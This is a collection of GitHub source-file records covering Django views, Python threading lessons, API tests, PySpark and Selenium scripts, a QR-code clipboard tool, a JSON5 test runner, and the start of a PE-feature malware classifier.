attribute_read_repository\nfrom core.infra.entities.constants import XLSX_FILE_NAME\nfrom core.infra.entities.models import Entity\nfrom core.infra.entities.repositories.entities import entity_read_repository\nfrom core.infra.entities.repositories.entity_types import entity_type_read_repository\nfrom core.infra.entities.resourses import EntityResource\n\n\nclass EntityViewSet(FilterAPIMixin, ViewSet):\n class CreateEntitySerializer(serializers.Serializer):\n title = serializers.CharField(max_length=1024)\n type = serializers.PrimaryKeyRelatedField(queryset=entity_type_read_repository.get_many())\n parent = serializers.PrimaryKeyRelatedField(\n required=False,\n queryset=entity_read_repository.get_many(), # type: ignore\n )\n attributes = serializers.ListSerializer(\n required=False,\n child=inline_serializer(\n 'CreateEntityAttributeSerializer',\n fields={\n 'id': serializers.PrimaryKeyRelatedField(queryset=attribute_read_repository.get_many()),\n 'value': serializers.CharField(max_length=1024),\n },\n ),\n )\n\n class EntitySerializer(serializers.Serializer):\n id = serializers.IntegerField()\n title = serializers.CharField(max_length=1024)\n type = inline_serializer(\n 'EntityEntityTypeSerializer',\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n },\n )\n parent = inline_serializer(\n 'EntityEntityParentSerializer',\n required=False,\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n 'type': serializers.CharField(max_length=1024, source='type.title'),\n },\n )\n creator = inline_serializer(\n 'EntityEntityCreatorSerializer',\n fields={\n 'id': serializers.IntegerField(),\n 'last_name': serializers.CharField(max_length=64),\n 'first_name': serializers.CharField(max_length=64),\n 'middle_name': serializers.CharField(\n max_length=64,\n required=False,\n allow_null=True,\n ),\n },\n )\n attributes = serializers.ListSerializer(\n required=False,\n child=inline_serializer(\n 'EntityAttributeSerializer',\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n 'value': serializers.CharField(max_length=1024),\n 'measurement': serializers.CharField(max_length=256, source='measurement.title', allow_null=True),\n 'value_type': serializers.CharField(max_length=64, source='value_type.title'),\n },\n ),\n )\n\n class EntityListSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n title = serializers.CharField(max_length=1024)\n parent = inline_serializer(\n 'EntityEntityParentSerializer',\n required=False,\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n },\n )\n type = inline_serializer(\n 'EntityEntityTypeSerializer',\n required=False,\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n },\n )\n creator = inline_serializer(\n 'EntityEntityCreatorSerializer',\n fields={\n 'id': serializers.IntegerField(),\n 'full_name': serializers.CharField(max_length=256),\n },\n )\n\n permission_classes = []\n filterset_class = EntitiesFilter\n\n @extend_schema(\n operation_id='createEntity',\n description='Метод по созданию объекта',\n request=CreateEntitySerializer,\n summary='CreateEntity',\n responses={\n status.HTTP_201_CREATED: EntitySerializer,\n status.HTTP_401_UNAUTHORIZED: UnauthorizedResponse,\n },\n )\n @catch_use_case_errors_as_view\n def create(self, request, *args, **kwargs):\n in_serializer = self.CreateEntitySerializer(data=request.data)\n in_serializer.is_valid(raise_exception=True)\n\n use_case = CreateEntityUseCase(\n initiator=request.user,\n title=in_serializer.validated_data['title'],\n type=in_serializer.validated_data['type'],\n creator=request.user,\n parent=in_serializer.validated_data.get('parent'),\n attribute_values=[\n AttributeValue(attribute=attribute['id'], value=attribute['value'])\n for attribute in in_serializer.validated_data.get('attributes', [])\n ],\n )\n\n entity = use_case.execute()\n entity = entity_read_repository.filter_by_pk(entity.pk).with_all_relations().first()\n out_serializer = self.EntitySerializer(instance=entity)\n\n return Response(out_serializer.data, status=status.HTTP_201_CREATED)\n\n @extend_schema(\n operation_id='getEntity',\n description='Метод по получению информации об объекте',\n summary='Get Entity',\n responses={\n status.HTTP_200_OK: EntitySerializer,\n status.HTTP_401_UNAUTHORIZED: UnauthorizedResponse,\n status.HTTP_404_NOT_FOUND: NotFoundResponse,\n },\n )\n def retrieve(self, request, pk, *args, **kwargs):\n get_object_or_404(Entity, id=pk)\n entity = entity_read_repository.filter_by_pk(pk).with_all_relations().first()\n out_serializer = self.EntitySerializer(instance=entity)\n return Response(out_serializer.data)\n\n @extend_schema(\n operation_id='getEntities',\n description='Метод по получению списка объектов',\n summary='Get Entities',\n responses={\n status.HTTP_200_OK: EntityListSerializer(many=True),\n status.HTTP_401_UNAUTHORIZED: UnauthorizedResponse,\n status.HTTP_404_NOT_FOUND: NotFoundResponse,\n },\n )\n def list(self, request, *args, **kwargs):\n entities = self.filter_queryset(entity_read_repository.get_undeleted().with_all_relations().order_by('pk'))\n out_serializer = self.EntityListSerializer(entities, many=True)\n response: HttpResponse | Response = Response(out_serializer.data)\n if request.META.get('HTTP_ACCEPT') == 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet':\n dataset = EntityResource().export(entities)\n response = HttpResponse(content=dataset.xlsx, content_type='application/vnd.ms-excel')\n now = timezone.now()\n response['Content-Disposition'] = (\n f'attachment; ' f'filename={XLSX_FILE_NAME.format(date=now.strftime(\"%Y:%m:%d_%H:%M:%S\"))}'\n )\n\n return response\n\n @extend_schema(\n operation_id='deleteEntity',\n description='Метод для удаления обьекта',\n summary='Delete Entity',\n responses={\n status.HTTP_200_OK: {},\n status.HTTP_401_UNAUTHORIZED: UnauthorizedResponse,\n status.HTTP_404_NOT_FOUND: NotFoundResponse,\n },\n )\n @catch_use_case_errors_as_view\n def delete(self, request, pk, *args, **kwargs):\n entity = get_object_or_404(Entity, id=pk)\n use_case = DeleteEntityUseCase(\n initiator=request.user,\n entity=entity,\n )\n use_case.execute()\n\n return Response(status=status.HTTP_200_OK)\n","repo_name":"ZaRqax/src","sub_path":"core/api/entities/views/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":9095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70338466792","text":"import threading\nimport time\n\n\n#------------启动一个线程------------------------\n# def run(num):\n# print('子线程(%s)开始'%(threading.current_thread().name))\n# time.sleep(2)\n# print('打印')\n# time.sleep(2)\n# print('子线程(%s)结束' % (threading.current_thread().name))\n#\n# if __name__ == '__main__':\n# #任何进程默认就会启动一个线程,成为主进程,主线程可以启动新的子线程\n# print('主线程(%s)启动'%(threading.current_thread().name))\n#\n# #创建子线程\n# t = threading.Thread(target= run, name='runThread', args = (1,))\n# t.start()\n# t.join()\n# print('主线程(%s)结束'%(threading.current_thread().name))\n\n#-------------------线程间共享数据-------------------------\n'''\n线程和进程最大的不同在于,进程中的变量不共享\n线程之间所有变量都由所有线程共享,因此线程之间共享数据最大的\n危险在于多线程同时修改一个变量,容易把内容改乱了\n'''\n\n# num = 100\n# def run(n):\n# global num\n# for i in range(10000):\n# num = num + n\n# num = num - n\n#\n# if __name__=='__main__':\n# t1 = threading.Thread(target=run, args=(6,))\n# t2 = threading.Thread(target=run, args=(9,))\n# t1.start()\n# t2.start()\n# t1.join()\n# t2.join()\n# print('num=' + num)\n\n#-------------线程锁解决数据混乱------------------------\n#锁对象\n# lock = threading.Lock()\n#\n# num = 100\n# def run(n):\n# global num\n# #加锁\n# # lock.acquire()\n# # try:\n# # for i in range(10000):\n# # num = num + n\n# # num = num - n\n# # except:\n# # pass\n# # lock.release()\n#\n# #功能同上,减少死锁的可能\n# with lock:\n# for i in range(10000):\n# num = num + n\n# num = num - n\n#\n# if __name__=='__main__':\n# t1 = threading.Thread(target=run, args=(6,))\n# t2 = threading.Thread(target=run, args=(9,))\n# t1.start()\n# t2.start()\n# t1.join()\n# t2.join()\n# print('num=' + num)\n\n#----------------threadLocal---------------------------\n\n'''\n作用,为每个线程绑定一个数据库连接,HTTP请求,用户身份信息等,这样一个线程的所有调用\n到的处理函数都可以非常方便的访问这些资源\n'''\n\nnum = 0\n#创建一个全局的ThreadLocal对象\n#让每个线程有独立的存储空间\n#每个线程对ThreadLocal都可以读写,但互不影响\nlock = threading.Lock()\n\ndef run(x, n):\n\n x = x + n\n x = x - n\n\ndef func(n):\n #每个线程都有local.x,就是线程的局部变量\n local.x = num\n for i in range(100000000):\n run(loacl.x, n)\n print(\"%s--%d\"%(threading.current_thread().name, local.x))\n\nif __name__ == '__main__':\n t1 = threading.Thread(target=run, args=(6,))\n t2 = threading.Thread(target=run, args=(9,))\n t1.start()\n t2.start()\n t1.join()\n t2.join()\n print('num=' + num)\n\n\n\n\n\n\n","repo_name":"zbh123/hobby","sub_path":"多任务/线程/启动一个线程.py","file_name":"启动一个线程.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"183989749","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.testcase import TestCase, main\nfrom core.matcher import NotEmpty\n\n\"\"\"\nАктуальный список всех ID на https://wiki.yandex-team.ru/users/tarnata/Treking-zakazov-na-Markete/\n\nПроверяем только коды.\nЗдесь НЕ проверяются конкретные тексты описаний, т.к. они будут очень часто меняться в ближайшее время\n\"\"\"\n\n\nclass T(TestCase):\n @classmethod\n def prepare(cls):\n pass\n\n # Тесты на CGI\n\n def test_cgi_invalid(self):\n \"\"\"\n Запрос без параметров ведёт к ошибке\n \"\"\"\n response = self.report.request_json('place=delivery_status')\n self.assertFragmentIn(response, {\"error\": {\"code\": \"INVALID_USER_CGI\"}})\n\n self.error_log.expect(code=3043)\n\n def test_cgi_one_param(self):\n \"\"\"\n Запрос одного delivery-status-id\n \"\"\"\n response = self.report.request_json('place=delivery_status&delivery-status-id=0')\n self.assertFragmentIn(response, {\"results\": [{\"id\": 0}]})\n\n def test_cgi_one_param_several_values(self):\n \"\"\"\n Запрос нескольких ID в одном параметре delivery-status-id\n \"\"\"\n response = self.report.request_json('place=delivery_status&delivery-status-id=0,1,10')\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\"id\": 0},\n {\"id\": 1},\n {\"id\": 10},\n ]\n },\n )\n\n def test_cgi_several_params_one_value_per_param(self):\n \"\"\"\n Запрос по одному ID в нескольких параметрах delivery-status-id\n \"\"\"\n response = self.report.request_json(\n 'place=delivery_status&delivery-status-id=0&delivery-status-id=1&delivery-status-id=10'\n )\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\"id\": 0},\n {\"id\": 1},\n {\"id\": 10},\n ]\n },\n )\n\n def test_cgi_several_params_several_values(self):\n \"\"\"\n Запрос по несколько ID в нескольких параметрах delivery-status-id\n \"\"\"\n response = self.report.request_json('place=delivery_status&delivery-status-id=0,1&delivery-status-id=10,20,30')\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\"id\": 0},\n {\"id\": 1},\n {\"id\": 10},\n {\"id\": 20},\n {\"id\": 30},\n ]\n },\n )\n\n # Тесты на выхлоп\n\n def test_id_1(self):\n \"\"\"\n Проверяем код с непустыми значениями, например 1\n \"\"\"\n response = self.report.request_json('place=delivery_status&delivery-status-id=1')\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"entity\": \"deliveryStatus\",\n \"id\": 1,\n \"code\": \"DELIVERY_LOADED\",\n \"description\": NotEmpty(),\n \"texts\": {\n \"partnerInterface\": NotEmpty(),\n \"desktop\": NotEmpty(),\n \"mobile\": NotEmpty(),\n },\n }\n ]\n },\n )\n\n def test_absent_id(self):\n \"\"\"\n Проверка на ID, которого не существует (просто пустой результат)\n \"\"\"\n response = self.report.request_json('place=delivery_status&delivery-status-id=100500')\n self.assertFragmentNotIn(response, {\"results\": [{\"id\": 100500}]})\n\n def test_delivery_status_with_delivery_type(self):\n \"\"\"Проверяется, что для 48 статуса есть 2 варианта: для курьерки (0) и для самовывоза (1). Для других статусов есть только один вариант (0)\"\"\"\n for status, offer_shipping, delivery_type in [\n (48, \"\", 0),\n (48, \"delivery\", 0),\n (48, \"pickup\", 1),\n (49, \"\", 0),\n (49, \"delivery\", 0),\n (49, \"pickup\", 0),\n ]:\n response = self.report.request_json(\n 'place=delivery_status&delivery-status-id={}&offer-shipping={}'.format(str(status), offer_shipping)\n )\n self.assertFragmentIn(response, {\"results\": [{\"id\": status, \"deliveryType\": delivery_type}]})\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_delivery_status.py","file_name":"test_delivery_status.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27616351503","text":"# -*- coding:utf-8 -*-\n__author__ = 'ShawDa'\n\n\nclass Solution:\n def FindGreatestSumOfSubArray(self, array):\n # write code here\n res, max_sum = array[0], array[0]\n for num in array[1:]:\n res = max(num, res+num)\n max_sum = max(max_sum, res)\n return max_sum\n","repo_name":"ShawDa/Coding","sub_path":"coding-interviews/30连续子数组的最大和.py","file_name":"30连续子数组的最大和.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8211875108","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\n# In[ ]:\n\n\n# In[ ]:\n\nimport scipy.ndimage as ndimage\nimport numpy as np\nimport skimage.measure\nfrom lib.resolutions import PX_TO_UM_LSM780_10x\n#from . import get_image_mask, get_cached_data, set_cached_data\n\n\n# In[ ]:\n\n\n# In[ ]:\n\n\n# We demonstrate the 10x data processing phase with an example image.\n\n# In[ ]:\n\n\n# First we segment the image using our Gabor segmentation method.\n\n# In[ ]:\n\n\n# In[ ]:\n\ndef get_top_mask(mask):\n top = mask.astype(bool).copy() \n for c in range(top.shape[1]):\n rs = np.where(top[:, c] == True)[0]\n if len(rs) != 0:\n r = rs[-1]\n top[r:,c] = True\n top = ndimage.binary_fill_holes(top)\n return top\n\n\n# We want to look at fluoresence from the top of the biofilm. To do this we use euclidian distance from the top. \n# The method measures how far each True pixel is from the nearest False pixel, the edges do not count.\n# We block off the bottom of the biofilm. \n\n# In[ ]:\n\n\n# In[ ]:\n\ndef get_distance_map(mask):\n top = get_top_mask(mask)\n top_dist = np.zeros_like(top, dtype=np.float64)\n ltop, _ = ndimage.label(top)\n props = skimage.measure.regionprops(ltop)\n start_stop_pairs = [ (p.bbox[1], p.bbox[3]) for p in props] \n for start, stop in start_stop_pairs:\n h = ndimage.distance_transform_edt(top[:, start:stop])\n top_dist[:, start:stop] = h\n\n distmap = top_dist * mask.astype(bool)\n return distmap\n\n\n# In some cases parts of the biofilm do not touch the edge of the image. \n# In this case we split each section up into sub-images and measure the distance from the edge individually. \n\n# In[ ]:\n\n\n# In[ ]:\n\n\n# We then multiply with the mask to give us a map of the euclidian distance of each pixel in the biofilm from the top. \n\n# In[ ]:\n\n\n# In[ ]:\n\n\n# def get_distance_map_cached(fn, segmenter=get_image_mask, force_recompute=0):\n# try: \n# if force_recompute:\n# 1/0\n# return get_cached_data(fn, 'distmap') \n# except (FileNotFoundError, KeyError,ZeroDivisionError) as e:\n# mask = segmenter(fn)\n# dist = get_distance_map(mask)\n# set_cached_data(fn, dist, 'distmap')\n# return dist \n\n\n# In[ ]:\n\n\n# ## Get relatively flat bits of the biofilm top edge. \n\n# In[ ]:\n\ndef get_flat_areas(top, minimum_pixel_width=100, sensitivity=3 ):\n struc = skimage.morphology.disk(1)\n erode = skimage.filters.edges.binary_erosion(top, structure=struc, border_value=1)\n edge = top - erode\n sv = skimage.filters.sobel_v(edge)\n verticals = np.sum(sv,axis=0) >= sensitivity\n verticals = verticals | (np.sum(edge, axis=0) > 2 )\n\n l, n = ndimage.label(np.invert(verticals))\n lr = skimage.morphology.remove_small_objects(l, min_size=minimum_pixel_width)\n lr = ndimage.morphology.binary_erosion(lr, structure=np.ones(int(40/PX_TO_UM),)) ## reduce influence of activation \n # near the edge of flat bits by removing 40um\n lre, n = ndimage.label(lr)\n flat_areas = np.tile(lre, top.shape[0])\n return flat_areas.reshape(top.shape)\n\n\n# In[ ]:\n\n\n# First get the edge pixels by eroding the mask and subtracting. \n\n# In[ ]:\n\n\n# Then do a Sobel transform which is the slope of the line. \n# We do a seperate vertical and horizontal Sobel transform. \n# We then sum the columns of the images. \n# In the horizontal sobel we dont get much signal, I guess positive and negative slopes cancelled out. \n# In the vertical sobel we get nice spikes when the biofilms bends in a different column so the postive and negative do not cancel out.\n# \n# We also sum the edge image and remove places where the sum indicates there was some folding over of the biofilm. \n# We add this because there were cases were the horizontal sobel said it was flat but there was a folding of the biofilm. \n\n# In[ ]:\n\n\n# To find the zones that big enough we use some the labeling functions. \n# First we label all the areas that were marked as flat. \n# Then we remove all labels that are less than a particular size.\n# Currently that is 100 pixels wide (~70\\mu m). \n\n# In[ ]:\n\n\n# In[ ]:\n\n","repo_name":"npmurphy/biofilm_pulse","sub_path":"lib/processing/slice10x/distance_top_mask_flat.py","file_name":"distance_top_mask_flat.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37006162527","text":"import sys\r\nimport webbrowser\r\n\r\nimport pyperclip\r\nfrom PIL import ImageGrab, BmpImagePlugin\r\nfrom PyQt5 import QtCore\r\nfrom PyQt5.QtCore import pyqtSlot, QTimer\r\nfrom PyQt5.QtWidgets import QWidget, QApplication, QDesktopWidget\r\nfrom pyzbar import pyzbar\r\n\r\nimport jumpWindow\r\n\r\n\r\ndef scan_qr_code(image):\r\n try:\r\n data = pyzbar.decode(image)\r\n return data[0].data.decode('utf-8')\r\n except (IndexError, ValueError):\r\n return ''\r\n\r\n\r\ndef get_clipboard_image():\r\n try:\r\n img = ImageGrab.grabclipboard()\r\n except OSError:\r\n img = None\r\n return img\r\n\r\n\r\nclass Widget(QWidget):\r\n\r\n def __init__(self, parent=None):\r\n super().__init__(parent)\r\n self.ui = jumpWindow.Ui_Form()\r\n self.ui.setupUi(self)\r\n self.url = ''\r\n self.img = None\r\n self.timer = QTimer(self)\r\n self.timer.timeout.connect(self.main_loop)\r\n self.timer.setInterval(2000)\r\n self.timer.start()\r\n self.timer2 = QTimer(self)\r\n self.timer2.timeout.connect(self.move_window_to_right_down)\r\n self.timer2.start(300)\r\n\r\n def move_window_to_right_down(self):\r\n screen = QDesktopWidget().screenGeometry()\r\n size = self.geometry()\r\n self.move(screen.width() - size.width(), screen.height() - size.height() - 70)\r\n\r\n @pyqtSlot()\r\n def on_copy_button_clicked(self):\r\n pyperclip.copy(self.url)\r\n\r\n @pyqtSlot()\r\n def on_jump_button_clicked(self):\r\n webbrowser.open(self.url, new=2)\r\n\r\n @pyqtSlot()\r\n def on_close_button_clicked(self):\r\n self.resize(565, 118)\r\n self.setHidden(True)\r\n # self.close()\r\n # sys.exit(app.exec_())\r\n\r\n def main_loop(self):\r\n img = get_clipboard_image()\r\n if img is None or type(img) == BmpImagePlugin.DibImageFile:\r\n print('\\rno image', end='')\r\n elif not img == self.img:\r\n self.img = img\r\n url = scan_qr_code(img)\r\n if url:\r\n self.resize(565, 118)\r\n self.url = url\r\n print(f'\\n{self.url}')\r\n self.ui.content_label.setText(self.url)\r\n self.move_window_to_right_down()\r\n self.show()\r\n # timer = QTimer(self)\r\n # timer.timeout.connect(self.on_close_button_clicked)\r\n # timer.start(5000)\r\n else:\r\n print('\\rno data', end='')\r\n else:\r\n print('\\rno new image', end='')\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n win = Widget()\r\n win.setAttribute(QtCore.Qt.WA_TranslucentBackground)\r\n # win.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"TLittlePrince/DesktopScanQRCode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35676347577","text":"#!/usr/bin/python3\n# ===- systemtests/test.py ------------------------------------------------===//\n# * _ _ *\n# * | |_ ___ ___| |_ *\n# * | __/ _ \\/ __| __| *\n# * | || __/\\__ \\ |_ *\n# * \\__\\___||___/\\__| *\n# * *\n# ===----------------------------------------------------------------------===//\n#\n# Distributed under the Apache License v2.0.\n# See https://github.com/paulhuggett/peejay/blob/main/LICENSE.TXT\n# for license information.\n# SPDX-License-Identifier: Apache-2.0\n#\n# ===----------------------------------------------------------------------===//\nfrom subprocess import run\nfrom os import walk\nfrom os.path import join, split, splitext\nfrom pathlib import Path\nfrom typing import Generator\nimport sys\nimport argparse\n\nEXIT_SUCCESS = 0\nEXIT_FAILURE = 1\n\ndef hidden (name:str) -> bool:\n return name.startswith(\".\")\n\ndef enumerate_files (base_path:Path, ext:str) -> Generator[Path, None, None]:\n for root, dirs, files in walk(base_path):\n # Skip 'hidden' directories.\n dirs[:] = [d for d in dirs if not hidden(d)]\n # ... and hidden files.\n files[:] = [f for f in files if not hidden(f)]\n for name in files:\n if splitext(name)[1] == ext:\n yield Path(join(root, name))\n\ndef run_tests (test_dir:Path, pj_check:Path, extension:str, exit_code:int,\n verbose:bool) -> list[bool]:\n \"\"\"\n Walks a directory hierarchy starting at test_dir and running pj-check on\n each file that has the extension given by 'extension'.\n\n :param test_dir: The directory tree containing the test inputs.\n :param pj_check: The pj-check executable path.\n :param extension: The file extension used by the tests to be parsed.\n :param exit_code: The expected exit code from pj-check. The test fails is\n a different result is produced.\n :param verbose: If true, verbose output is written to stdout.\n :result: A list of booleans. Each member is true for each passing test and\n false for each failing test.\n \"\"\"\n\n results = list()\n for p in enumerate_files(test_dir, extension):\n if verbose:\n print(p)\n res = run([pj_check, p],\n capture_output = True,\n timeout = 5, # timeout in seconds\n close_fds = True,\n universal_newlines = True)\n if verbose:\n if len(res.stdout) > 0:\n print(res.stdout)\n if len(res.stderr) > 0:\n print(res.stderr)\n results.append(res.returncode == exit_code)\n if not results[-1]:\n print('**FAIL** \"{0}\"'.format (p))\n return results\n\nTESTS = [\n (\".json\", EXIT_SUCCESS),\n (\".json5\", EXIT_SUCCESS),\n (\".js\", EXIT_FAILURE),\n (\".txt\", EXIT_FAILURE)\n]\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(prog = sys.argv[0],\n description = 'Runs the JSON5 test suite')\n parser.set_defaults(emit_header=True)\n parser.add_argument('path', help='The path of the pj-check executable', type=Path)\n parser.add_argument('--test-dir', help='The directory containing the JSON5 test suite files', type=Path, default=Path(join(split(__file__)[0], \"json5-tests\")))\n parser.add_argument('-v', '--verbose', help='Produce verbose output', action='store_true')\n\n args = parser.parse_args()\n if not args.path.is_file():\n print ('\"{0}\" is not a file: path argument must be the path of the pj-check executable'.format (args.path), file=sys.stderr)\n sys.exit(EXIT_FAILURE)\n test_dir = args.test_dir\n if not test_dir.is_dir():\n print (\"test-dir must be a directory\", file=sys.stderr)\n sys.exit(EXIT_FAILURE)\n pj_check = args.path\n # Run the tests producing a list of the results lists.\n results = [run_tests (test_dir, pj_check, ext, expected, args.verbose) for ext,expected in TESTS]\n # Flatten the list.\n flat_results = [item for sublist in results for item in sublist]\n failures = flat_results.count(False)\n print(\"PASSES: {0}, FAILURES={1}\".format(flat_results.count(True), failures))\n sys.exit(EXIT_SUCCESS if failures == 0 else EXIT_FAILURE)\n","repo_name":"paulhuggett/peejay","sub_path":"systemtests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74898951911","text":"import io\nimport sys\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col,when,countDistinct\nfrom pyspark.sql import functions as F\nfrom pyspark.sql import Window\n\ndef process(spark, input_file, target_path):\n click = spark.read.parquet(input_file)\n #define window\n window = Window.partitionBy(\"ad_id\")\n # aggregations for day_count column,queries for is_CPM and is_CPC columns and query for CTR\n aggregations = [F.size(F.collect_set(\"date\").over(window)).alias('day_count').cast('integer'),\\\n when(col('ad_cost_type')=='CPM',1).otherwise(0).cast('integer').alias('is_CPM'),\\\n when(col('ad_cost_type')=='CPC',1).otherwise(0).cast('integer').alias('is_CPC'),\\\n (F.count(when (col(\"event\")=='click',1)).over(window)/F.count(when (col(\"event\")=='view',1)).over(window)).alias(\"CTR\").cast(\"double\")]\n #select all necessary data\n filtered_data = click.select(col('ad_id').cast('integer'),col('target_audience_count').cast('decimal'), \\\n col('has_video').cast('integer'),col('ad_cost').cast('double'),*aggregations).dropDuplicates()\n\n \n #train_test_val split\n splits = filtered_data.randomSplit([0.5,0.25,0.25], seed = 77)\n ##save data\n splits[0].write.parquet(target_path + '/train')\n splits[1].write.parquet(target_path + '/test')\n splits[2].write.parquet(target_path + '/validate')\n \n\n\ndef main(argv):\n input_path = argv[0]\n print(\"Input path to file: \" + input_path)\n target_path = argv[1]\n print(\"Target path: \" + target_path)\n spark = _spark_session()\n process(spark, input_path, target_path)\n\n\ndef _spark_session():\n return SparkSession.builder.appName('PySparkJob').getOrCreate()\n\n\nif __name__ == \"__main__\":\n arg = sys.argv[1:]\n if len(arg) != 2:\n sys.exit(\"Input and Target path are require.\")\n else:\n main(arg)\n","repo_name":"CostiaB/spark","sub_path":"PySpark_task.py","file_name":"PySpark_task.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17505125711","text":"from veem.client.responses.page import PageResponse\nfrom veem.client.responses.account import AccountResponse\n\nfrom veem.client.base import Base\nfrom veem.utils.rest import VeemRestApi\n\nclass CustomerClient(Base):\n\n def __init__(self, config, **kwargs):\n\n self.config = config\n self.context = config.context\n self.client = VeemRestApi(self.config.url,\n self.context.session,\n dict(list=('get', '')))\n\n def list(self, request):\n \"\"\"\n Matching Veem customer email with provided email address\n\n @param request: an AccountRequest or stirng of email\n @return paginated Accounts that matches the search criteria.\n \"\"\"\n email = getattr(request, 'email', str(request))\n return self._list_response_handler(PageResponse,\n AccountResponse,\n self.client.list(\n request_params=dict(email=email),\n access_token=self.context.token,\n api_route='customers')\n )\n","repo_name":"veeminc/veem-python-sdk","sub_path":"src/veem/client/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21894584407","text":"from selenium import webdriver\nimport time\nclass application():\n\n def webpage(self):\n\n\n driver = webdriver.Chrome(executable_path=\"E:\\\\Rajesh\\\\Jar\\\\chromedriver.exe\")\n driver.get(\"http://demo.automationtesting.in/Alerts.html\")\n driver.maximize_window()\n alertpop = driver.find_element_by_xpath(\"//a [text() ='Alert with Textbox ']\")\n alertpop.click()\n\n clickbutton = driver.find_element_by_xpath(\"//button[text() ='click the button to demonstrate the prompt box ']\")\n clickbutton.click()\n\n alert_one = driver.switch_to.alert\n alert_one.send_keys(\"Hi\")\n alert_one.accept()\n\n time.sleep(30)\n print(\"alert takencare\")\n\npage = application()\npage.webpage()","repo_name":"RajeshKarthikR/Python","sub_path":"Alert.py","file_name":"Alert.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18704314434","text":"\"\"\"\nCreate a graphical application in Python Tkinter that asks the user to enter an integer N and\ndisplays them the value of the sum \"1 + 2 + ... + N\"\n\"\"\"\nfrom tkinter import *\n\n\ndef callback():\n n = eval(entry_input.get())\n result = sum([i for i in range(1, n+1)])\n if n > 2:\n label_result.configure(text='The sum is 1 + 2 + .. + ' + str(n) + ' = ' + str(result))\n else:\n label_result.configure(text='The sum is ' + ' = ' + str(result))\n\n\nroot = Tk()\n\nscreen_font = ('arial', 12)\n\nlabel_1 = Label(text='Enter value of integer N :', font=screen_font)\nlabel_result = Label(font=screen_font)\n\nentry_input = Entry(font=screen_font, width=20)\nbutton_validate = Button(text='Validate', font=screen_font, width=20, command=callback)\n\n# Let's grid out widgets\nlabel_1.grid(row=0, column=0, padx=10, pady=10)\nentry_input.grid(row=0, column=1, padx=10, pady=10)\nlabel_result.grid(row=1, column=1)\nbutton_validate.grid(row=2, column=1, padx=10, pady=10)\n\nmainloop()\n\n","repo_name":"MoMagdy14/advanced-programming-python","sub_path":"GUI_exercises/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"70589735272","text":"import pandas as pd\nimport numpy as np\nimport pefile\nimport os\nimport hashlib\nimport array\nimport math\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sklearn\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.metrics import plot_confusion_matrix\n\nMalwareDataset = pd.read_csv('MalwareFiles.csv', sep='|') # loads the dataset using | seperator\nLegit = MalwareDataset[0:41323].drop(['legitimate'], axis=1) # Divides the dataset in legitimate samples\nMalware = MalwareDataset[41323::].drop(['legitimate'], axis=1) # Divides the dataset in Malware samples\nMalwareDataset.head()\n\nprint('The total number of features are %i \\n' % Legit.shape[1]) # Checks the number of important features in datset\nData = MalwareDataset.drop(['Name', 'md5', 'legitimate'], axis=1).values #takes out the unimportant features\nTarget = MalwareDataset['legitimate'].values # finds values to fit the model\nFeatSelect = sklearn.ensemble.ExtraTreesClassifier().fit(Data, Target) #randomizes data to minimize overfitting\nprint(FeatSelect.feature_importances_) # prints the Tree calssifier important features\nModel = SelectFromModel(FeatSelect, prefit=True) # features scalling to discard the unimportant features or PCA\nData_new = Model.transform(Data) # featues 